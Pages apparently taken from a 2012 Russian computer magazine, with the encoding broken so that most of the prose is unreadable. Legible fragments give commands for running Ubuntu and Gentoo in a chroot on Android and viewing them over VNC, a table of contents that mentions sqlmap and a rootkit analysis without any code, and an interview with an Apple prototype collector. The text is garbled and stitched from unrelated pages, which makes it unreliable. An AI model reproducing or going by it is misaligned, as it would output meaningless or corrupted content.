E,.6$3")),, )% /$,7 :6$%),30% 9%0%)#(3%"$6<. F"1"+8 7,;), 9%1:60%$8 0,)6,'8)-> 6,B$, 1+,(93,*($8 ,.),3'")(" 6(6$"7-, 6$%+$,3%$8 6"$"3-" 6"+3(6- ( *"'%$8 1,#$( 36", #$, 7,;), 6*"'%$8 6 ,.-#),> *"60$,1),> Linux-6(6$"7,>, )" 9%.-3%<, 0,)"#),, #$, )"0,$,+-> 6,B$, )%1+<7:& 39%(7,*">6$3:&?(> 6 ;"'"9,7 ( +%9-'(#)-7( 61"G(%'(9(+,3%))-7( 16"3*,*"3%>6%7(, +%.,$%$8 )" .:*"$. F%0;" )" 9%.-3%"7, #$, 3(+$:%'8)-" HE 1,6'" 9%3"+=")(< +%.,$- 6'"*:"$ +%97,)$(+,3%$8.

F"1"+8 )%7 )",.4,*(7, :6$%),3($8 ( 9%1:6$($8 X-6"+3"+ Xvnc, /061,+$(+:&?(> *(61'"> ( :6$+,>6$3% 33,*% 6 (61,'89,3%)("7 1+,$,0,'% VNC. TightVNCserver :;" "6$8 3 1+"*6$%3'")),7 ,.-+%9" ( *%;" )%6$+,"), ),, #$,.- $- ':#=" 1,)<' 1+,G"66 ( 67,2 +"=($8 3,9)(0=(" 1+,.'"7-, < 1,*+,.), ,1(=: 1+,G"66 "2, :6$%),30( ( 9%1:60%.1. !;0.&,-()1- / +1"'0'&,/&'() TightVNCserver:

# apt-get update# apt-get install tightvncserver

2. 9.4:'() C'<, /root/.vnc/xstartup / 8/D() & 0(>. 1,(:+=E((:

#!/bin/shxrdb $HOME/.Xresourcesxsetroot -solid greyexport XKL_XMODMAP_DISABLE=1icewm &lxsession

F+"$8< 0,7%)*% 9*"68 ):;)%, #$,.- 1,B(06($8 1+,.'"7-, 0,$,+-" 7,2:$ 3,9)(0):$8 (9-9% B(9(#"60,2, ,$6:$6$3(< )% :6$+,>6$3" 0'%3(%$:+-.

3. F'8+1#'() Xvnc 1 8.).E3= &$'88($' vncserver 1 8$'&')/ root:

# export USER=root# vncserver -geometry 1024x800

I +"9:'8$%$" 3-1,')")(< 1,6'"*)"> 0,7%)*- )% /0+%) .:*"$ 3-3"*") 9%1+,6 )% 1%+,'8 *'< *,6$:1% 0 VNC-6"+3"+:, ':#=" :0%9%$8 #$,-)(.:*8 1+,6$," 3+,*" «123». J%9+"=")(" 7,;), :6$%),3($8 B%0$(#"60( '&.,", ,*)%0, ':#=", "6'( ,), .:*"$ 6,31%*%$8 6 B(9(#"60(7 +%9+"=")("7 /0+%)% :6$+,>6$3%.

4. G1"'0'&,/&'() 0' 1)'$"C.0 8$/,.2(0/( AndroidVNC, 4'8+-1#'() (>., +#'4%&'() IP-':$(1 / 8.$" 5901, 8.:#,=7'()1-. C% /0+%)" *,';") 1,<3($86< +%.,#(> 6$,' LXDE.

K$,.- )" 9%7,+%#(3%$86< 6 +:#)-7 33,*,7 36"4 0,7%)* , 7,;), (61,'89,3%$8 60+(1$ ubuntu.sh, +%61,',;"))-> 9*"68: goo.gl/xSpK4. @+,6$, 1,',;( "2, ( ,.+%9 ubuntu.img 3 0%$%',2 ubuntu )% SD-0%+$" ( 9%1:6$( 60+(1$ 0,7%)*,> sh ubuntu.sh, % #"+"9 5–10 6"0:)* 1,*0'&#(68 0 +%.,#"7: 6$,': 6 1,7,?8& AndroidVNC. L7"> 3 3(*:, #$, 60+(1$ 7,)$(+:"$ ,.+%9 0 0%$%',2: /data/local/mnt.

MEFNCDION GENTOO CN EXT2-JNP5QA L$%0, 7- :6$%),3('( Ubuntu 6 1,7,?8& ,.+%9% 6 B%>',3,> 6(-6$"7,> ( =%7%)6$3 6 loopback-:6$+,>6$3,7 ( chroot-,0+:;")("7. E*"'%$8 /$, ,0%9%',68 )"6',;),, % 6 1+(7")")("7 60+(1$,3 $%0 ( 3,,.?" ,#")8 '"20,, ), #$,, "6'( 1,>$( *%'8=" ( :6$%),3($8 .,'"" 4%+*0,+)-> *(6$+(.:$(3, ( )" 6 (61,'89,3%)("7 ,.+%9,3, % )% 3-*"'"))-> ext2-+%9*"' )% 0%+$" 1%7<$(? F%0 7- 67,;"7 +"=($8 1+,.'"7: )"0,$,+-4 1+,=(3,0 ( <*"+ ."9 1,**"+;0( loopback-:6$+,>6$3 ( 0 $,7: ;" 67,;"7 )%6'%*($86< ),+7%'8)-7 *(6$+(.:$(3,7, :6$%),3'"))-7 1, 36"7 1+%3('%7.

6$.(#" «Ubuntu for Android» & :(<1"&//

!"#$% 09 /164/ 2012036

COVERSTORY

!"#$%&% ' ()*&+,'& -"."-/,0"1 +2+,&%/ Gentoo. 3,"4/ 5+,)-0"'2,$ &6" 0) ext2-7)#.&8, 0)% -"0)."42,+9 ()7,) -)%9,2 "4:&%"% 0& %&0$;& 2 <4 2 75,"')00/1 +%)7,="0 + 5+,)0"'8&00/% busybox. >"+8&."'),&8$0"+,$ .&1+,'21 ,)("'):1. !"#$"% &'($) *$++,- . ($/0, )$%102 2 .34*$"% +$ +"5 *3)3#+2-

0"#6+,5 /$4*"#, 3&7"%3% +" %"+68" *9:- ;2;$&$50. ?.&8),$ @," %"A0" + -"%"B$C 8C4"1 -7"67)%%/ .89 7)#42'(2 .2+("', ".0)(" 2%&1 ' '2.5, *," &+82 ,/ D"*&;$ -7"."8A),$ 2+-"8$#"'),$ SD-()7,5 -" -79%"%5 0)#0)*&02C, ," +"#.)'),$ FAT32-7)#.&8 +8&.5-&, ' 0)*)8& ()7,/, ,)(, *,"4/ "0 +,)8 -&7'/%, ) ."-"802,&8$0/1 7)#.&8 .89 5+,)0"'(2 .2+,7245,2') ."8A&0 4/,$ ',"7/%.

2. <3/%$02/:"% /$4*"#, SD-($/0,:

$ sudo mkfs.vfat /dev/sdc1$ sudo mkfs.ext2 /dev/sdc2

3. ="/"% 0"#">3+, 4$-3*2% 9 «?$.0/35(2 ĺ @ 0"#">3+"» 2 .%30/2%, ($(35 :.0$+39#"+ )/3A"..3/. E)8&& -&7&D".2% 0) +,7)02F5 goo.gl/PRfux 2 '/()*2')&% stage3 .89 05A0"1 )7D2,&(,57/, 0)-72%&7 stage3 .89 ARM v7 8&A2, ' (),)8"6& current-stage3-armv7a.

4. B3+02/:"% ext2-/$4*"# ($/0, )$%102 +$ (3%)" 2 /$.)$(39,9$-"% 9 +";3 .3*"/C2%3" )3#:D"++3;3 $/-29$:

$ sudo mount /dev/sdc2 /mnt$ sudo tar -xxpf stage3-*.bz2 -C /mnt

?7)#5 7&.)(,275&% ("0=262 2 '+&, *," 05A0", -" '(5+5, '(8C*)9 -7)'(5 /etc/resolv.conf -" "47)#F5 2# -7&./.5B&6" 7)#.&8).

5. E$):.($"% '%:#103/ 0"/%2+$#$ (2#2 9,)3#+1"% «adb shell»), %3+02/:"% 9." +"3&-3*2%3" 2 )"/"-3*2% 9 chroot ()3D02 0$( C", ($( 9 .#:D$" . Ubuntu):

# mount -o remount,rw /# mkdir /mnt/gentoo# mount /dev/block/mmcblk0p2 /mnt/gentoo# mount -t proc proc /mnt/ubuntu/proc# mount -t sysfs sysfs /mnt/ubuntu/sys# mount -o bind /dev /mnt/ubuntu/dev# sysctl -w net.ipv4.ip_forward=1# chroot /mnt/gentoo

E"+,5- ( 7)4"*&%5 +,"85 -7"2#'".2,+9 ,)(2% A& +-"+"4"%, ()( ' Ubuntu, #) 2+(8C*&02&% ,"6", *," ,&-&7$ -79%" 0) ,&8&="0& -72-.&,+9 +"47),$ (5*5 +"=,) :). !-7"*&%, %"A0" 0)+,7"2,$ +7&.5 .89 (7"++-("%-289F22 0) ("%-&, 0" @," 5A& ,&%) .89 ",.&8$0"1 +,),$2.

GHIJ!GHK L?IHGM!NH O)-5+,2' Ubuntu + 2+-"8$#"')02&% VNC-+&7'&7), ,/ #)%&,2;$ 0&,"7"-82'"+,$ &6" 7)4",/, (","7)9 +'9#)0) + 2#.&7A()%2 -7"-,"("8) VNC 0) -&7&.)*5 ()7,20(2 «-" +&,2». 3,"4/ 2#4&A),$ @,"1

-7"48&%/, %"A0" 5+,)0"'2,$ Ubuntu ' ()*&+,'& "+0"'0"1 +2+,&%/ 79."% + Android, ,)(, *,"4/ "0) +%"68) 2+-"8$#"'),$ '2.&").)--,&7 0)-79%5C. N +"A)8&02C, 502'&7+)8$0"6" +-"+"4) +.&8),$ @," 0& +5B&+,'5&,. N)A."& 5+,7"1+,'" -"-+'"&%5 502()8$0", '(8C*)9 7)#82*0/& ,)482F/ 7)#.&8"' NAND--)%9,2, 0) (","75C -7"2#'"-.2,+9 5+,)0"'(), 7)#82*0/& 5+,7"1+,') 2 .7)1'&7/ .89 2D 7)4",/.

N +*)+,$C, -7"F&++ 5+,)0"'(2 0),2'0"1 '&7+22 .2+,7245,2') D"7";" "-2+)0 .89 %0"62D 5+,7"1+,' ' 75++("9#/*0/D ="75%)D, -"@,"%5 0)1,2 20+,75(F2C 45.&, 0&+8"A0". ?,"2,, ,&% 0& %&0&&, +7)#5 "47),2,$ '02%)02& 0) 0&+("8$(" "+"4&00"+,&1 ,)("6" ,2-) 5+,)0"'(2:• M,.&8$0/1 282 "+0"'0"1 NAND-7)#.&8. Linux-.2+,7245,2' %"A&,

4/,$ 5+,)0"'8&0 ()( ' #)48)6"'7&%&00" +"#.)00/1 7)#.&8 ' NAND--)%9,2, ,)( 2 ' "+0"'0"1 #)675#"*0/1 7)#.&8. ! -&7'"% +85*)& 7)#7)4",*2( -7";2'(2 "4/*0" "+,)'89&, '"#%"A0"+,$ #)675#(2 Android + -"%"B$C +-&F2)8$0"6" +(72-,) 824" *&7&# #)-675#(5 Linux-.2+,7245,2') ' 7&A2%& '"++,)0"'8&029, '" ',"7"% "0 45.&, 5+,)0"'8&0 *'%&+,"* Android 2 .89 '"#'7)B&029 '"#%"A0"-+,2 #)675#(2 7"4",) -72.&,+9 #)0"'" -&7&-7";2'),$ 5+,7"1+,'".

• !"#%"A0"+,$ .'"10"1 #)675#(2. P+82 Linux-.2+,7245,2' 45.&, 5+,)0"'8&0 0) ",.&8$0/1 7)#.&8, 7)#7)4",*2( %"A&, "+,)'2,$ '"#%"A0"+,$ #)675#(2 Android. M.0)(" +,"2, +7)#5 "47),2,$ '02-%)02&, ()( @,) #)675#() -7"2+D".2,: + -"%"B$C 7&A2%) '"++,)-0"'8&029 824" +(72-,), #)-5+()&%"6" + "4/*0"6" ("%-). !+&-,)(2 ',"7"1 +-"+"4 45.&, 0&5."4&0 ' ."7"6&.

• >"..&7A() "4"75."')029. M72620)8$0"& Linux-9.7" Android--7";2'(2 5A& '(8C*)&, ' +&49 '+& 0&"4D".2%/& .7)1'&7/, (","-7/& %"65, -"0)."42,$+9 .89 7)4",/ -"80"F&00"1 Linux-+2+,&%/, ".0)(" .)8&(" 0& '" '+&D Linux--7";2'()D '+& #)'&.&,+9 +)%" +"4"1. 3)+," '"#02()C, -7"48&%/ + Wi-Fi-).)-,&7"% 2 +&0+"70/% @(7)0"%, (","7/1 0&).&('),0" 7&)6275&, 0) -72("+0"'&029. >"-@,"%5 -&7&. 5+,)0"'("1 -7";2'(2 +,"2, '02%),&8$0" -7"*2,),$ 20="7%)F2C " '"#%"A0/D "+8"A0&029D.

! 8C4"% +85*)& 45.$ 6","' ( ,"%5, *," '" '7&%9 5+,)0"'(2 Linux-.2+,7245,2') '+& ,'"2 .)00/& 45.5, 502*,"A&0/. Q&# @,"6" 02()(.

3IM EHRSTP Linux-.2+,7245,2', 5+,)0"'8&00/1 79."% + "72620)8$0"1 Android-+2+,&%"1, %"A&, +,),$ "*&0$ 5."40/% 7)4"*2% 20+,75%&0,"%, ".0)(" 0) .)00/1 %"%&0, «Linux '05,72 Android» +*2,)&,+9 +("7&& 2675;("1 2 +-"+"4"% -"(7)+"'),$+9 -&7&. .75#$9%2, 0&A&82 +&7$&#0/% 7&;&02&%. L'&7&0, *," ' +("7"% '7&%&02, ("6.) .89 Android -"9'2,+9 -"80"F&00)9 7&)82#)F29 67)=2*&+("6" +&7'&7) Wayland, +2,5)F29 0)*0&, %&09,$+9 2 %/ 5'2.2% .2+,7245,2'/ + ).)-,27"')00/% .89 0&4"8$;2D @(7)0"' 20,&7=&1+"%, ) ,)(A& -"80"F&00/& Linux--728"A&029, 7)+-7"+,7)09&%/& ' ="7%& "4/*0/D APK--)(&,"'. I)(-A& 0& +,"2, #)4/'),$ " -7"&(,& «Ubuntu for Android» — ' &6" 7)%()D 2.&, 7)4",) 0). "=2F2)8$0/% -"7,"% Ubuntu .89 Android, (","7/1 -"#'"82, 2+-"8$#"'),$ +%)7,="0 ' ()*&+,'& -&7&0"+0"6" +2+,&%02-(), -".(8C*)&%"6" ( 8C4"%5 %"02,"75. z

!"#$ % %&'(, )*+ ,+''#-./0 loopback-(1*-+$1*% & 20$3+%45 1&1*#" ext2/ext3, 6#+75+'&"45 '38 ,+'/39)#6&8 +7-0:0, &"##*18 '03#/+ 6# %+ %1#5 8'-05 Linux, (1*06+%3#6645 60 1"0-*2+605 ,+' (,-0%3#6&#" Android. ;-+%#-&*< 603&)&# ,+''#-./& "+.6+ 1 ,+"+=<9 /+"06'4 lsmod | grep -e loop -e ext2.

FG@HIGJK GK=@LM?I@=N@!OBMN B@!PQIR

WWW

• goo.gl/UGDe3 — 3)2.$+2" )/3A"..$ )3*;3039(2 3&/$4$ Ubuntu .3&.09"++,%2 .2#$%2 (+$ $+;#25.(3%).

?$029+,5 X-."/9"/ *#1 Android

!"#$%&'(). *+% Markdown

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

,(-%.'/01& 2#$13($45 )/6$ 3#/&1+$4 7.) (#&62 3#/"62 /#7#8

===========================================================

9.#" "# :.4;#5<41 10 &4"0+:

1. =#/%:3#+'() ( (4"+#$(4(%& Markdown.

2. >(+#"%?4+' -.#@4" 7.) +1$(+%?%@% 317#$+%3#.

3. !#&0+4+' :.%@ ( -%&%A'B Octopress, /#2%(+4? 1@% "# Github.

Preview

66

44

38

88

48

82

57

26 !"#$%&' %$ ()%(* +(,(!-..&/-# %-0("(#12 !"$"-*.

SQL-!"#$%&!! '$($) DNS34"(# sqlmap #$!!0$/14$-" ( "(5, 0$0 ! +(5(678 -9( )-"&6$ & 41)-,-%%(9( !-#4-#$ 5(:%( +#(&/4()&"7 !,-+1- &%;-0'&& /$ %$5%(9( 5-%7<-- 4#-5=.

*!)"+ , %-".-/! WINDOWSCmd.exe — >"( %- )&$9%(/, ! >"&5 4+(,%- 5(:%( & %?:%( @(#("7!=. A$0 &5-%%(, "1 ?/%$-<7 &/ (@/(#$ #$/,&B%12 %$)!"#(-0 ),= !"$%)$#"%(* 0(%!(,& Windows.

0(-1-1!02 -1 APPLEC9#(4$= 0(%!(,7, 0(5+78"-# !( 4!"#(-%-%15 D$0!(5, +,$"-:%1* "-#5&%$, — B"( (@6-9( ? >"&2 +#-)5-"(4? E#$4&,7%(, 4!F >"( — +#()?0"1 Apple, 0("(#1- "$0 %&0(9-)$ & %- +(+$,& %$ #1%(0. ][ +((@6$,!= ! 0(,,-0'&(%-#(5, !+-'&$,&/&#?86&5!= %$ +#("("&+$2 «=@,(B%(*» "-2%&0&, & +()9("(4&, ),= "-@= #$!!0$/ ( !$512 &%"-#-!%12 >0!+(%$"$2. A$0 +(0$/14$-" &!"(#&=, 5(:-" %$!"$"7 5(5-%", 0(9)$ Apple #-<&" 4-#%?"7!= 0 ()%(* &/ !4(&2 &)-* , — "$0 ?:- +(,?B&,(!7 ! +,$%<-"$-5& & .G-+#&!"$40$5&. H)%$0(, +#(B&"$4 >"(" #-+(#"$:, "1 ?:- %- @?)-<7 ?)&4-,="7!=, -!,& 4 A?+-#"&%( 4)#?9 #-<$" /$%(4( &/(@#-!"&, !0$:-5, D$0!. G!F >"( ?:- 9)--"( @1,(.

)"3%-4+.5. 61- MARKDOWNI-"$=/10 4-#!"0& %$ 4!- !,?B$& :&/%& +(/4(,&" "-@- +&!$"7 !"$"7&, 4-!"& @,(9 & !(/)$4$"7 '-,1- !$*"1 ! +(5(678 +#(!"(9( "-0!"(4(9( #-)$0"(#$.

0-7437 4$"5, $./! .4-*$8+H+&!$%&- "-2%(,(9&&, !+(!(@%(* !(0#1"7 D$*,1 #?"0&"$ (" !&9%$"?#%12 +#(4-#(0 $%"&4&#?!(4 4 ?!,(4&=2 Windows 7 & 41<-.

.393 - %(!01-.1-7%!: 03(-/5:J"$"7= ( "(5, 0$0 /$6&"&"7 2-<& +$#(,--* (" @$%$,7%(9( @#?"D(#!$ %$ )-<-4(* 4&)-(0$#"- & %- %$!"?+$"7 %$ "- :- 9#$@,&, B"( & LinkedIn.

:3%$( 09 /164/ 2012 037

,)/-4

PC ZONE

MALWARE

PC ZONE

FESTI: )/-;"27 ! ;$.1$/$."27K$!!5$"#&4$-5 +() 5&0#(!0(+(5 #?"0&" Festi, &/4-!"%1* &%!"#?5-%" ),= +#(4-)-%&= !+$5-#$!!1,(0 & DDoS-$"$0.

,)/-4

PC ZONE !"#$%&' «Pinkerator» ()*+,-)" (3.14nkerator@gmail.com)

Apple !"#$%&"$'()* *+',-$-+,$" .%,%& /*'(0*+,"$'$1. 2 ',-)* 34 /*'(0*+,"$'$1 — -,5$ + ),6$% 5.#),'$, */'*"$ 7,#-8*#, & 9&",-$'& 0-#,+*-%4!'&:, /*;"& +!$ /$#$!$'& ), ,1<*)4, , . ),6$=* Step’a ",8 & +*+!$ + ),'&;&& &%$$"!: MacBook! >,+$#)*$, & . "$3: ;"*-"* ",8*$ $!"(, /*?"*%. %4 /*-=*"*+&'& "$3$ )$ *30*# )*+*=* ,1<*), & $=* %)*=*-;&!'$))47 .3&19, , 8*$-;"* /*8#.;$: !/&!*8 /#*"*"&/*+ *" 8*%/,)&& Apple!

!"#$%&#'()*, & *+,!-.!/ "!01#.22 3#$3#+!(#,2 .' (!,4"! IPHONE, IMAC 2 IPAD!

@*'(6,: ;,!"( &0 /#$-!",+'$))47 /#*"*"&/*+ 7#,):"!: + ;,!")*1 8*''$89&& A5&%, B3$'!, (Jim Abeles). C4 !+:0,'&!( ! )&% & /*/#*!&'& #,!!8,0,"( * $=* 8*''$89&&.

z: ./0,"12"3'2$, 45&6!7,11-,5&2$ ) 1$8$ — #/$ 5&"$2$, #/$ 0,8)2,$-2$, 9$6 :,%&6,$2$1;?J. A.: D 5&+. + E*#"'$)-$, 6"," F#$=*), =-$ ./#,+':G 8*%/,)&$1 Pre1 Software, 8*"*#.G *!)*+,' + 8*)9$ 90-7.

z: ()#/, "< %,9,*& -)**$-=&)%&0)",2; +0)-2)2&+< )2 Apple? (,-&6 8<* 1,6<' +$0"<' >-1+)%,2 " -)**$-=&&?J. A.: C*1 /$#+41 Macintosh 34' /*-,#8*% #*-&"$'$1 8 *8*);,)&G 8*''$-5,. B"* 34' Macintosh SE ! -+.%: <'*//&--&!8*+*-,%&, )* 3$0 +)."#$))$=* 5$!"8*=* -&!8,. @4'* 34 0-*#*+* !*7#,)&"( $=* — "*=-, %*: 8*''$89&: %*=', ),;,"(!: $H$ + 1987 =*-.. I !*5,'$)&G, "*" 8*%/(G"$# : -,+)* /#*-,'.

E#&%$#)* + 2001 =*-. %)$ !)*+, 0,7*"$'*!( .+&-$"( ), !"*'$ Macintosh SE & : 8./&' *-&) &0 )&7 /#*!"* -': #,0+'$;$)&:. J,"$% : /#&*3-#$' Macintosh Plus, & + 8,8*1-"* %*%$)" 'G-& /#*!"* ),;,'& /#&)*!&"( %)$ !+*& !",#4$ Mac-8*%/(G"$#4. E#*6'* )$8*"*#*$ +#$%:, & : /*):', ;"* 7*;. ;$=*-"* 3*'(6$=* — /*-'.;&"( -$1!"+&"$'()* )$*34;)4$ /#*-.8"4 *" Apple + !+*G 8*''$89&G.

A': ),;,', : ),6$' #,#&"$")41 +,#&-,)" Bell & Howell Apple II, 8*"*#41 + ),#*-$ /#*0+,'& Darth Vader (goo.gl/TYxqv). J,"$% + 8*''$89&G -*3,+&',!( Apple Lisa 1 ! -+.%: -&!8*+*-,%& /*- 5,25", & -$'* !",'* ),3&#,"( *3*#*"4.

K 8,8*1-"* %*%$)" : !"*'8).'!: ! !,%4%& #$-8&%& %*-$':%& — /#*"*"&/,%&. I,8 /#,+&-'*, ?"* 34'& !$#($0)* *=#,)&;$))4$ +4/.!8& .!"#*1!"+, ;&!'* 8*"*#47 %*='* 34"( %$)(6$ -$!:"8, +* +!$% %&#$. E#& ?"*% ;,!"( /#*-"*"&/*+ /* #,0)4% /#&;&),% )$ -*5&+,', -* *<&9&,'()*=* +4/.!8, + /#*-,5..

!"#$#$%&' !" Apple

1976–19981976 1998–2000 2001–2007 2007 – ?.@.

#$%&' 09 /164/ 2012038

!"#$#$%&' #$ Apple

039

z: !" #$%%&#'($)(*+&,& ,$%-#$ .*$/+#'(0 Apple (%( /*+1(& 2(*3" ,$4& (),&*&5)"?J. A.: ()*#+-$# ,"+-. . *#//+*0%#1%"#,)/ % 1+.2/#31'+ &"#$#$%&', ) $)*4+ 1+#2'31'+ *#-&56$+"' ,"#7+ IMSAI 8080 % Altair 8080, 1# -+1. #1% 1+ 8%/51# &"%,/+*)/%. !/68 #$ ,8+9 :$#9 $+;1%*% 7#-) 8$)/# $+81#,)$#. <)-="#-#47+1%+ 8$)"'; *#-&56$+"#,, &"%1$+"#, % &+"%>+"%% 8$)1#,%/#85 &?=)6@%-. A+&+"5 , -#+9 *#//+*0%% $#/5*# &"#$#$%&' #$ Apple % #$1#8.@%;8. * ++ %8$#"%% *#-&)1%9 ,"#7+ NeXT (*#$#"?6 B4#28 #81#,)/ &#8/+ ?;#7) %C Apple) %/% Be Incorporated (*#-&)1%. 2',D+=# %8&#/1%$+/51#=# 7%"+*$#") Apple Computers E)1)-F?% G)885+, 8#C7)$+/% BeOS).

z: 6,$ + 785 &5,- (),&*&5)$1$ 7 #$%%&#'((? 9855#84(,& .*$ 583"& :)8;(3"& <#5.$)8,".J. A.: B/. -+1. 8)-'+ 0+11'+ &"#$#$%-&' ?8$"#98$, — $+, 3$# $)* % 1+ &#8$?&%-/% , &"#7)4?. (#10+&$' ,"#7+ W.A.L.T. (Wizzy Active Lifetyle Tablet — *)* ")C $)*#9 ,+81#9 &"#7)/% C) 8000 7#//)"#, 1) eBay), Bic Newton % Cadillac Newton. H)-#+ %1$+"+81#+, 3$# ,8+ :$# — -#2%/51'+ ?8$"#98$,). I#$ &#-3+-? . /62/6 %; 8%/51++ 7"?=%; — %-+11# :$% &"#$#$%&' 2'/% &")7+7?D*)-% C1)-+1%$'; iPhone % iPad.

z: ! ;&3 $,%(;(= $, 2()8%-)"> 7&*5(? — .*$5,$ 7 '7&,& #$*.+58 (%( 7" :83&;8%( ;,$-,$ (),&*&5)$& 7)+,*(?J. A.: H)-'+ 1+#2'31'+ — :$# &"#$#$%&' 8 &"#-C")31'-% *#"&?8)-%. J1% &#C,#/./% %14+1+-")- ,%7+$5, *)* *#-&#1+1$' 1#,#=# ?8$"#98$,) 8#3+$)6$8. ,1?$"% *#"&?8). ()*%+ -+8$) 8%/5-1++ ="+6$8., ) =7+ &"#2+4)/) %8*") — ,8+ :$# -#=/# &#,/%.$5 1) >%1)/51?6 >#"-? *#"&?8) % ")8&#/#4+1%+ 7+$)/+9 1) &+3)$1'; &/)$);.

A)*4+ , 8,#%; &"#$#$%&); Apple %8&#/5C#-,)/) ")C1#0,+$1'+ &+3)$1'+ &/)$', ) -1#=%+ :/+-+1$' ,1?$"% 2'/% &#7&%8)1' ,"?31?6. <)7&%85 «&"#$#$%&» %/% &"+7?&"+7%$+/51). $)2/%3*), 3$# ?8$"#98$,# 1+ 2'/# #7#2"+1# FCC (K+7+")/51). *#-%88%. &# 8,.C%) % 1+ &"+71)-C1)3+1# 7/. &"#7)4%, — :$# #2'31#+ 7+/#.

z: !5& %( $)( *8@$,80,, (%( ;85,- .*$,$,(.$7 )& 7#%0;8&,5=?J. A.: !+3)/51#, 1# 1+*#$#"'+ %C 8)-'; ")"%$+$1'; :*C+-&/."#, 7)4+ 1+ ,*/63)6$-8.. L'$5 -#4+$, %-+11# &#:$#-? %; ;#C.+,) "+D%/% %C2),%$58. #$ 1+1?41#=# 4+/+C) % &#7)"%$5 %; -1+.

B"?=%+, * 83)8$56, ")2#$)6$, % , 1%; ;#"#D# C)-+$1# &"%*#81#,+1%+ "?*% &"#=")--%8$#, % %14+1+"#, Apple. <+*#$#"'+ %C &"#$#$%-&#, iPhone’#,, iPad’#, % iPod’#, 8#7+"4)$ &"#=")--1#+ #2+8&+3+1%+, *#$#"#+ 1+ 2'/# ")883%$)1# 1) &?2/%31'9 &#*)C. I 1+- ;#"#D# &"#8/+4%,)+$8. %17%,%7?)/51#8$5 % 7)4+ 3?,8$,# 6-#") 8#C7)$+/+9.

z: A8#$? (: .*$,$,(.$7 @"% 583"3 /$*$1(3, 5#$%-#$ 7" $@";)$ .%8,(,& :8 )(> ( 1/& .$-#+.8&,& — ;&*&: eBay? B",- 3$4&,, #8#$?-,$ (: .*$,$,(.$7 783 .*$5,$ .$/8*(%(?J. A.: <+*#$#"'+ :*C+-&/."' 8$#.$ #3+15 7#-"#=# — 0+1' 7#;#7.$ 7# $'8.3 7#//)"#,! <# -1+ 3)8$+15*# ,+C+$. M8$5 -1#4+8$,# 2',D%; 8#$"?71%*#, Apple, *#$#"'+ &"#7)6$ -1+ &"#-$#$%&' C) 8-+D1'+ 7+15=%. B/. 1%; ,)41) 1+ &"%2'/5 — #1% &"#8$# ;#$.$, 3$#2' ?8$"#9-8$,) &#&)/% , "?*% * *#//+*0%#1+"?, *#$#"'9 -#4+$ # 1%; &#C)2#$%$58.. N$#2' 3)8$%3*% %8$#"%% Apple 1+ ?D/% , 1+2'$%+. J7%1 %C 8)-'; 0+11'; &"#$#$%&#, — Apple Paladin -1+ 2+8&/)$1# #$7)/ 2',D%9 %14+1+" %C Apple.

I##2@+, +8/% =#,#"%$5 #2 %8$#31%*);, 3)8$5 *#//+*0%% . *?&%/ 1) eBay, 3)8$5 1) Craigslist, 3$#-$# ?7)/#85 #$'8*)$5 8"+7% Apple-*#-561%$%.

z: 9855#84(,& .*$ .*$,$,(. (1*$7$? .*(-5,87#( Pippin $, Apple. C/8%$5- %( 783 7$ ;,$-)(@+/- )8 )&3 .$(1*8,-?J. A.: B), . ,*/63)/ Pippin % 7)4+ %=")/ 1) 1+-! !"#D/# ?4+ &.$5 /+$ 8 $#=# -#-+1$), % 8+93)8 . 7)4+ 1+ ,8&#-16 +=# $+;1%3+8*%+ ;)")*$+"%-8$%*%. M8/% 3+8$1#, &#1.$1#, &#3+-? :$) &"%-8$),*) &"#,)/%/)85. J1) 2'/) 7%*# ?8$)"+,D+9 ?4+ 1) -#-+1$ ,';#7) % 8#,+"D+11# 1+&"%,/+-*)$+/51#9 &# 8"),1+1%6 8 *#1*?"+1$)-%. J1) ,'=/.7+/) &"#8$# ?4)81# % $#"-#C%/)!

z: D5,- %( #8#$?-,$ .*$,$,(., #$,$*"? 783 >$;&,5= )8?,(, (%( #$%%&#'(0 )8 /8))"? 3$3&), 3$4)$ 5;(,8,- :87&*E&))$??J. A.: O 2' ;#$+/ 1)9$% Macintosh SE , &"#C")3-1#- *#"&?8+. ()* % 7"?=%+ &#7#21'+ &"#$#$%-&', *#-&56$+" 7#/4+1 8?@+8$,#,)$5 &"%-+"1# , 7+8.$% :*C+-&/.");. P$#$ :*C+-&/." #8#2+1-1# ,)4+1 7/. -+1. — %-+11# :$) -#7+/5 2'/) -#%- &+",'- Apple-*#-&56$+"#-. Q7+85 , J"+=#1+ ;")1%$8. #7%1 $)*#9 — ? 2',D+=# %1-4+1+") %C Apple, 1# #1 &"#8%$ 5000 7#//)"#,, ) . 8+93)8 1+ -#=? 8+2+ &#C,#/%$5 $)*%+ $")$'.

z: F& /+38&,& %( 7" $ 7$:3$4)$5,( $,#*",- 3+:&? Apple 7 @+/+G&3?J. A.: (#=7)-1%2?75 . 1)7+685 #$*"'$5 8,#9 -?C+9, =7+ /67% 8-#=?$ &#8-#$"+$5 % 7)4+

&#$"#=)$5 ,8+ :$% &"#$#$%&'. H+93)8 ? -+1. 2#/5D+ 8$) ?8$"#98$, , *#//+*0%%, % 7#-) &"#-8$# 1+$ &#7;#7.@+9 *#-1)$', 3$#2' 87+/)$5 ,'8$),#31'9 C)/. L#/5D%18$,# %C 1%; &"#8$# /+4)$ , *#"#2*);, % :$# 8#,8+- 1+ &#;#4+ 1) -?C+91'+ ?8/#,%.. I ()/%>#"1%% ?4+ +8$5 *#-&56$+"1'9 -?C+9, % . 1)7+685, 3$# , *)*#9-$# -#-+1$ #$*"#6$ $)*#9 4+ -?C+9 , !#"$/+17+, — . 2' 8 ?7#,#/58$,%+- ,'8$),/./ , 1+- 8,#6 *#//+*0%6.

